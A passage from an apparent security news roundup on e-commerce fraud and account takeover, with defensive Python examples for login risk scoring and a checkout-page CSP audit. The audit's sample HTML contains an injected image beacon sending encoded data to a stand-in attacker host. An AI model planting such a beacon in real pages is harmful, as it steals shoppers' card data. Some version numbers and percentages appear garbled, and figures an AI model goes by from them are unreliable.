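risk, and feeds a later chargeback back into the account's state.
Weights and thresholds are assumptions, not Riskified's model.
"""
from dataclasses import dataclass, field

# Decisions a merchant can take at login time.
ALLOW, NOTIFY_OWNER, STEP_UP_2FA = "allow", "notify_owner", "step_up_2fa"


@dataclass
class Account:
    email: str
    known_devices: set = field(default_factory=set)  # fingerprints seen on past logins
    known_asns: set = field(default_factory=set)     # network operators seen on past logins
    chargebacks: int = 0
    force_password_reset: bool = False


@dataclass
class LoginEvent:
    device_id: str
    asn: str               # hypothetical network identifier (e.g. operator/ASN)
    proxy: bool            # hypothetical signal: anonymizing proxy or VPN in use
    details_changed: bool  # e.g. shipping address or email changed right after login


def login_risk(acct: Account, ev: LoginEvent) -> int:
    """Return a 0-100 score; higher means less likely to be the rightful owner."""
    if acct.force_password_reset:
        return 100  # flagged after a chargeback: never trust this account silently
    score = 0
    if ev.device_id not in acct.known_devices:
        score += 40
    if ev.asn not in acct.known_asns:
        score += 20
    if ev.proxy:
        score += 25
    if ev.details_changed:
        score += 15
    return min(score, 100)


def login_decision(score: int) -> str:
    """Unfamiliar device/network: notify the owner or apply two-factor authentication."""
    if score >= 60:
        return STEP_UP_2FA
    if score >= 30:
        return NOTIFY_OWNER
    return ALLOW


def checkout_decision(login_score: int, cart_risk: int) -> str:
    """The takeover is not the end goal: judge the order, not only the login."""
    if cart_risk < 20:
        return "approve"  # a low-risk cart rescues a suspicious-looking login
    if login_score >= 60 or cart_risk >= 60:
        return "review"
    return "approve"


def record_chargeback(acct: Account) -> None:
    """A safe-looking event followed by a chargeback: force a password change."""
    acct.chargebacks += 1
    acct.force_password_reset = True


def confirm_owner(acct: Account, ev: LoginEvent) -> None:
    """After the customer passes 2FA or resets the password, enroll the new signals."""
    acct.known_devices.add(ev.device_id)
    acct.known_asns.add(ev.asn)
    acct.force_password_reset = False


if __name__ == "__main__":
    # Constructed walk-through of one account.
    acct = Account("shopper@example.test", {"dev-A"}, {"AS1"})
    for ev in (LoginEvent("dev-A", "AS1", False, False),
               LoginEvent("dev-B", "AS9", True, True)):
        s = login_risk(acct, ev)
        print(ev.device_id, ev.asn, "risk", s, "->", login_decision(s))
    print("checkout (login 40, cart 10):", checkout_decision(40, 10))
    record_chargeback(acct)
    print("after chargeback, known device:", login_risk(acct, LoginEvent("dev-A", "AS1", False, False)))
```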
“Our survey shows that merchants are aware of and concerned with ATO attacks, but they usually lack the ability to identify and prevent them,” said Assaf Feldman, CTO at Riskified.
“Without a dynamic approach that evaluates all relevant data, merchants risk significant financial losses, frustrated customers and damaged brand reputations. Advanced machine-learning solutions can instantly recognize legitimate customers and ease their path to checkout.
“Suspicious actions can be verified or blocked to minimize damage. By doing so, merchants maximize revenue while giving their customers a great experience.”
The importance of accounts
Accounts are an important shopping tool for customers:
- 3% of customers say they have accounts on individual sites for shopping.
- 75% do most or all of their online shopping with merchants where they have accounts.
- 42% said they shop more frequently when they have an account.
Merchants get a significant portion of their business from customers with accounts:
- More than 67% of the merchants surveyed say at least half of their orders come from customers with accounts.
- 58% of merchants report that account holders spend more per purchase than customers who use guest checkout.
- 61% say that account holders purchase more frequently than customers who use guest checkout.
“Companies can combat lateral phishing threats by adopting advanced security solutions that identify suspicious logins and take actions before breaches can occur. These controls enable businesses to verify users’ identities and enforce measures, such as MFA, which can limit an attacker’s chance of hijacking a corporate email address in the first place. Additionally, all companies can learn that it is essential to have full visibility and control over their customer data in order to prevent a breach. To do so, organizations must implement security solutions that remediate misconfigurations, enforce real-time access control, encrypt sensitive data at rest, manage the sharing of data with external parties, and prevent the leakage of sensitive information,” said Anurag Kahol, CTO at Bitglass.
The COVID-19 crisis is driving the global growth of e-commerce sales, with millions of consumers worldwide in quarantine shopping for goods, services and entertainment online.
Transaction volumes in most retail sectors have seen a 74 percent rise in March compared to the same period last year, while online gaming has seen a staggering increase of 97 percent, according to analysis by ACI Worldwide of hundreds of millions of transactions from global online retailers.
“During these unprecedented and uncertain times with millions now at home, many consumers are going online to purchase products or services,” said Debbie Guerra, executive vice president, ACI Worldwide.
“Quarantine has changed lives for all of us, with consumers buying electronics and furniture—to support work, communication, school and entertainment—as well as items such as home goods and DIY products.”
However, fraud is on the increase too, the research shows, as fraudsters are using the surge in online activity to target unsuspecting consumers and merchants.
Merchants are starting to experience dramatic increases in COVID-19-related phishing activities, with stolen credentials released into the e-commerce payments chain, as well as increased friendly fraud activities.
“Fraudulent attempts are on the rise, and consumers must be vigilant as fraudsters are using the current situation to obtain and use their financial data and information,” continued Guerra.
Online retailer sectors with rising transaction volumes in March 2020 compared to the previous year include:
- Home products and furnishings: +97 percent
- DIY products: +136 percent
- Garden essentials: +163 percent
- Electronics: +26.6 percent
- Telco: +18.6 percent
Online retail sectors with declining transaction volumes in the same period:
- Ticketing: -60 percent
- Travel: -44 percent
- Online dating: -8.9 percent
- The average value of an attempted fraudulent purchase increased by $36 in March, driven by electronic and retail goods; this corresponds to a 13 percent increase in attempted fraudulent transaction value.
- The volume of attempted fraudulent transactions decreased by 8 percent, driven by the increase in the average attempted fraudulent purchase value.
“Long term, we and others in the industry predict that the shift in consumer behavior—opting for online purchases—is likely to outlast the crisis,” concluded Guerra.
“The industry is well ahead of the curve in adapting payment methods and ways to combat fraud in response to the changing behaviors and expectations of consumers, which are now being expedited by the lockdown.”
Tips for consumers to protect identity and personal information
- Beware of online requests for personal information. Coronavirus-themed emails seeking personal information are likely to be phishing scams. Legitimate government agencies won’t ask for that information. Delete the email.
- Check the email address or link. Inspect a link by hovering the mouse button over the URL to see where it leads. Sometimes, it’s obvious the web address is not legitimate. But keep in mind phishers can create links that closely resemble legitimate addresses. Delete the email.
- Watch for spelling and grammatical mistakes. If an email includes spelling, punctuation and grammar errors, it’s likely a sign of a phishing email. Delete the email.
- Look for generic greetings. Phishing emails are unlikely to use a person’s name. Greetings like “Dear sir or madam” often signal an email is not legitimate.
- Avoid emails that insist on acting now. Phishing emails often try to create a sense of urgency or demand immediate action. Delete the email.
Tips for merchants to maintain security and deliver to customers
Maintain security and deliver a great customer experience, as consumer purchasing behavior—both genuine and fraudulent—has changed.
- For example: Express shipment and Buy-Online Pickup In-Store delivery methods in the last two weeks have tripled, making transaction decision speed and accuracy critical.
- Use customer profiling and time-on-file techniques to maintain the customer experience for valued customers and ensure good transactions are still accepted.
- Expect an increase in friendly fraud chargebacks as a result of growing financial difficulties among consumers. Friendly fraud occurs when a cardholder receives goods but denies making the purchase, or when a family member makes a purchase without the cardholder’s approval.
- Monitor systems and update as necessary. Business intelligence tools and real-time monitoring lead to immediate decisions and responses. Employ rapid access to fraud intelligence to inform rules changes in real time.
- Engage frequently with web and mobile site security management. Give these teams the tools, techniques and procedures to detect, contain and mitigate botnets. And considering the presence of both good and bad bots, put business policies in place to address this issue with clarity for both teams.
There has been a spike in digital commerce since social distancing became widespread globally, according to a TransUnion research.
The research found a 23% increase in global e-commerce transactions in the week following the World Health Organization declaring the novel coronavirus outbreak a pandemic on March 11th compared to the average weekly volume in 2020.
“It is clear that social distancing has changed consumer shopping behaviors globally and will continue to do so for the foreseeable future,” said Greg Pierson, senior vice president of business planning and development at TransUnion. “No doubt fraudsters will continue to follow the trends of good consumers and adjust their schemes accordingly.”
Increase in account takeover
In a recent survey of 1068 Americans 18 and older, 22% said they have been targeted by digital fraud related to COVID-19. The survey reported a 347% increase in account takeover and 391% rise in shipping fraud attempts globally against its online retail customers from 2018 to 2019.
“With so many reported data breaches, it’s not just about if your account will be hijacked, it’s about when,” said Melissa Gaddis, senior director of customer success for TransUnion Fraud & Identity Solutions.
“Once a fraudster breaks into an account, they have access to everything imaginable resulting in stolen credit card numbers and reward points, fraudulent purchases, and redirecting shipments to other addresses.”
E-commerce fraud and transaction methods
Typical methods used to take over an account include buying login details on the dark web, credential stuffing, hacking, phishing, romance scams and social engineering.
Shipping fraud is when criminals take over a customer account but don’t change the shipping address in order to avoid detection. Once the package has shipped, they intercept it at the carrier site and change the shipping address.
Besides account takeover and shipping fraud, there were also other significant e-commerce fraud and transaction trends:
- 42% decrease in promotion abuse from 2018 to 2019. Cybercriminals access accounts to drain loyalty points or create multiple new accounts to use the same promotion over and over, often against website and app terms. TransUnion believes this decrease can be attributed to fraudsters turning to more lucrative schemes such as account takeover.
- 78% of all e-commerce transactions came from mobile devices in 2019. That’s a 33% increase from 2018. E-commerce companies are scrambling to ensure a mobile-first experience for consumers not just to browse but to buy.
- 118% increase in risky transactions from mobile devices in 2019. Fraudsters have taken notice that more e-commerce transactions are coming from mobile devices and are trying to replicate that consumer behavior in order to avoid detection.
“Although the death of brick and mortar has been well documented, there is still plenty of room for e-commerce growth with one report claiming online retail only makes up 14% of all global retail sales,” said Gaddis.
“With so much room left for growth, it’s important that retailers stay ahead of the emerging transaction and retail trends to provide a friction-right experience for consumers and a fraudster-proof barrier.”
Online payment fraud attempts increased by 73 percent in 2019, according to a report from Sift.
Additional findings in the report reveal that cybercriminals are using mobile devices more than desktops or laptops to commit payment fraud. In fact, though Windows is the top single operating system for fraudsters, iOS and Android combine to make up more than half of attempted fraudulent transactions.
And while, unsurprisingly, the number one most targeted industry vertical in 2019 was physical e-commerce, business services, digital e-commerce, education, and on-demand services all fell within the top ten fraudiest verticals.
New ways to pay, new ways to steal
The most common payment type associated with fraud? Not credit cards. In fact, credit cards were beaten out by promotions/coupons, cryptocurrency, digital wallets, and even “pay with cash” options that are popular with some on-demand services.
Fraudsters swing for the fences
Rather than trying to avoid detection with smaller purchases, fraudsters look for larger scores, with fraudulent order values reaching three times the price of legitimate purchases on average.
Trying to game the system
The largest attempted purchase on Sift’s platform in 2019 was for a video game power-up sold on an online marketplace. The attempted payment was $1 million, and though obviously fraudulent, demonstrates some of the new methods bad actors are employing in order to steal from businesses.
Summer is the holiday shopping season for fraudsters
Fraudsters don’t wait until the winter holidays to kick their scams into high gear. Rather, payment fraud attempts peak during the summer months.
Working on the weekend
Saturdays had the highest instances of payment fraud attempts of any day of the week.
Adobe-owned Magento has plugged multiple critical vulnerabilities in its eponymous content management system, the most severe of which could be exploited by attackers to achieve arbitrary code execution.
About the fixed vulnerabilities
According to the newest Magento-themed security bulletin (now published as an Adobe security bulletin), three of the six fixed flaws are critical and three are important.
In the “critical” category are a deserialization of untrusted data (CVE-2020-3716) and a security bypass (CVE-2020-3718) that could lead to arbitrary code execution, and an SQL injection (CVE-2020-3719) that could be exploited to leak sensitive information.
In the “important” category are two stored cross-site scripting flaws (CVE-2020-3715, CVE-2020-3758) and a path traversal (CVE-2020-3717) vulnerability, all of which could lead to sensitive information disclosure.
All of these have been patched in:
- Magento Commerce versions 2.3.4 and 2.2.11
- Magento Open Source versions 2.3.4 and 2.2.11
- Magento Enterprise Edition (EE) version 188.8.131.52
- Magento Community Edition (CE) version 184.108.40.206
At the moment, there is no indication that any of these might be actively exploited by attackers. Nevertheless, users/admins are advised to update their installations as soon as possible.
Magento shops are a major target
Magento is one of the most popular open-source e-commerce platforms out there, but web stores running it have unfortunately become a prime – though not exclusive – target for card-skimming cybercriminals (aka Magecart attackers).
Vulnerabilities in the Magento core are just one vector through which attackers can gain access to online shops to insert card-skimming code into them. Other avenues of attack include bugs in popular extensions and plug-ins, phishing emails lobbed at site admins, and compromise of third parties that serve scripts on the target site(s).
There has been a 29% increase in suspected online retail fraud during the start of the 2019 holiday shopping season compared to the same period in 2018, and a 60% increase in suspected e-commerce fraud during the same period from 2017 to 2019, according to iovation.
The findings are based on the online retail transactions analyzed for its e-commerce customers between Thanksgiving and Cyber Monday over the last three years.
“Among the conclusions from TransUnion’s 2019 Holiday Retail Fraud Survey: nearly half of all consumers, 46%, are concerned with being victimized by fraudsters this holiday season with baby boomers being the most concerned of any generation at 54%,” said TransUnion Senior VP of Business Planning and Development, Greg Pierson.
Additional findings: Online retail fraud increase
The percentage of suspected fraudulent e-commerce transactions, relative to legitimate transactions, during the start of the holiday shopping season and over the entire year, for the past three years:
- 15% from Nov. 28 to Dec. 2, 2019. 10% so far in 2019.
- 13% from Nov. 22 to Nov. 26, 2018. 11% all of 2018.
- 11% from Nov. 23 to Nov. 27, 2017. 7% all of 2017.
The top days during the start of the 2019 holiday shopping season for legitimate and suspected fraudulent online retail transactions:
- Thanksgiving, Nov. 28: 16% of legitimate holiday weekend transactions (#5). 17% of suspected fraudulent holiday weekend transactions (#4-tie).
- Black Friday, Nov. 29: 26% of legitimate holiday weekend transactions (#1). 25% of suspected fraudulent holiday weekend transactions (#1).
- Saturday, Nov. 30: 19% of legitimate holiday weekend transactions (#3). 19% of suspected fraudulent holiday weekend transactions (#3).
- Sunday, Dec. 1: 17% of legitimate holiday weekend transactions (#4). 17% of suspected fraudulent holiday weekend transactions (#4-tie).
- Cyber Monday, Dec. 2: 22% of legitimate holiday weekend transactions (#2). 21% of suspected fraudulent holiday weekend transactions (#2).
The countries and U.S. cities from which the highest percentage of suspected fraudulent e-commerce transactions originated during the start of the 2019 holiday shopping season:
- China: 57%
- Central African Republic: 57%
- Lebanon: 45%
- Boardman, Oregon: 70%
- Pineville, Louisiana: 42%
- Alexandria, Louisiana: 38%
Mobile transaction and fraud trends
The survey also found that consumers used a mobile phone or tablet for 63% of their online retail transactions during the start of the 2019 holiday shopping season. That is up from 58% for the same period in 2018 and 56% for the same period in 2017.
For the holiday shopping weekend, retail transactions from a mobile phone compared to all e-commerce transactions were:
- 64% on Thanksgiving, Nov. 28
- 63% on Black Friday, Nov. 29
- 67% on Saturday, Nov. 30
- 66% on Sunday, Dec. 1
- 57% on Cyber Monday, Dec. 2
“Year after year it becomes clear that when not at work, consumers increasingly prefer using their mobile devices to make retail purchases due to their convenience,” said iovation’s Senior Director of Customer Success, Melissa Gaddis. “Once at work when they’re at their desk, consumers turn to their desktop and laptop computers to make purchases.”
Fraudsters, always trying to emulate the purchasing patterns of trusted consumers, also prefer mobile for fraudulent online retail transactions. A mobile phone or tablet appeared to be used for 63% of all suspected fraudulent e-commerce transactions during the long holiday shopping weekend, compared to 59% for the same period in 2018 and 51% for the same period in 2017.
A majority of U.S. consumers plan to do most of their holiday shopping online for the first time ever, yet a survey from F-Secure finds that most internet users remain concerned about their exposure to cybercrime.
Major consumer trends
The survey of shoppers highlighted 3 major trends among American consumers: Bank account hacking and data breaches are the biggest worries on the web. 62% are either worried or extremely worried about a hacker taking over …
Expect unprecedented levels of online data theft this holiday season due to a lack of deployed client-side security measures.
Disturbing lack of security measures
Tala Security highlights the widespread vulnerability resulting from integrations that enable and enhance website functionality. These integrations, which exist on nearly every modern website operating today, allow attackers to target PII and payment information.
98% of the Alexa 1000 websites were found to be lacking security measures capable of preventing attacks. In related warnings, both the FBI and the PCI Council cautioned that hackers are targeting online credit card information.
“Online merchants and website owners must recognize the critical need for client-side security. The fundamental driver of online commerce — consumer trust — is at stake as attackers target widespread client-side vulnerabilities to steal credentials, credit card numbers, financial data and other PII,” said Aanand Krishnan, CEO and co-founder of Tala Security.
Key findings from the survey
- Only 2% of Alexa 1000 sites have implemented effective controls to prevent personal, financial and credential theft.
- User form data, captured on forms present on 98% of websites, is exposed to 10 times more domains than the website owner intended. This creates a massive opportunity for attackers to steal data.
- The average website relies on 31 third-party integrations, which provide nearly two-thirds of the content customers view on their browsers. This content is delivered via client-side connections that lack effective security controls.
- Most consumers will be surprised to learn that only one-third of the content rendering on their browser is owned, created and served by the owner of the website. The remaining two-thirds is served via client-side connections that lack effective security.
- Although 27% of website owners attempt to deploy security measures, only 2% succeed in deploying effective policies capable of preventing client-side attacks.
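One way to measure the client-side exposure these findings describe, as an added example (not Tala Security’s scanner or code): parse a checkout page, list every external origin that can run script, receive a form post or receive data via an image request, compare them with the integrations the site owner intended, and emit the Content-Security-Policy that would confine the rest. The HTML, the site origin and the allowlist are constructed samples; the image beacon in the sample mirrors the skimmer exfiltration technique described earlier on this page.

```python
"""Client-side exposure audit for a checkout page (added example).

Counts the third-party origins a page talks to, flags those the site
owner did not intend, and builds a CSP limiting script execution, form
posts and image requests to the intended set. Sample data is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page: one intended analytics script, one unknown
# script host, an intended payment form target, and an injected image
# whose src carries a base64 payload (the pattern described on this page).
SAMPLE_HTML = """
<html><body>
<script src="https://www.example-shop.test/js/app.min.js"></script>
<script src="https://analytics.partner-a.test/tag.js"></script>
<script src="https://cdn.unknown-host.test/helper.js"></script>
<form id="checkout" method="post" action="https://pay.partner-b.test/submit">
  <input name="card"><button type="submit">Pay</button>
</form>
<img id="__preloader" src="https://exfil.attacker.test/i.gif?d=ZmFrZQ==">
</body></html>
"""

SITE_ORIGIN = "https://www.example-shop.test"  # constructed first-party origin

# Integrations the site owner declares as intended (constructed allowlist).
INTENDED = {
    "script-src": {"https://analytics.partner-a.test"},
    "form-action": {"https://pay.partner-b.test"},
    "img-src": set(),
}


class OriginCollector(HTMLParser):
    """Collect external origins, grouped by the CSP directive that governs them."""

    def __init__(self):
        super().__init__()
        self.origins = {d: set() for d in INTENDED}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self._add("script-src", a["src"])
        elif tag == "form" and a.get("action"):
            self._add("form-action", a["action"])
        elif tag == "img" and a.get("src"):
            self._add("img-src", a["src"])

    def _add(self, directive, url):
        p = urlparse(url)
        if p.scheme and p.netloc:  # absolute URL; relative ones are first-party
            origin = f"{p.scheme}://{p.netloc}"
            if origin != SITE_ORIGIN:
                self.origins[directive].add(origin)


def collect(html: str) -> dict:
    c = OriginCollector()
    c.feed(html)
    return c.origins


def audit(html: str) -> dict:
    """Per directive, the external origins that are not on the intended list."""
    found = collect(html)
    return {d: sorted(found[d] - INTENDED[d]) for d in found}


def third_party_count(html: str) -> int:
    """How many distinct external origins the page exposes the user to."""
    return len(set().union(*collect(html).values()))


def build_csp() -> str:
    """Policy allowing only the site itself plus the intended integrations."""
    parts = []
    for directive, allowed in INTENDED.items():
        parts.append(f"{directive} " + " ".join(["'self'"] + sorted(allowed)))
    return "; ".join(parts) + "; base-uri 'self'"


if __name__ == "__main__":
    print("external origins:", third_party_count(SAMPLE_HTML))
    for directive, extra in audit(SAMPLE_HTML).items():
        print(f"{directive:12} unexpected: {extra or 'none'}")
    print("Content-Security-Policy:", build_csp())
```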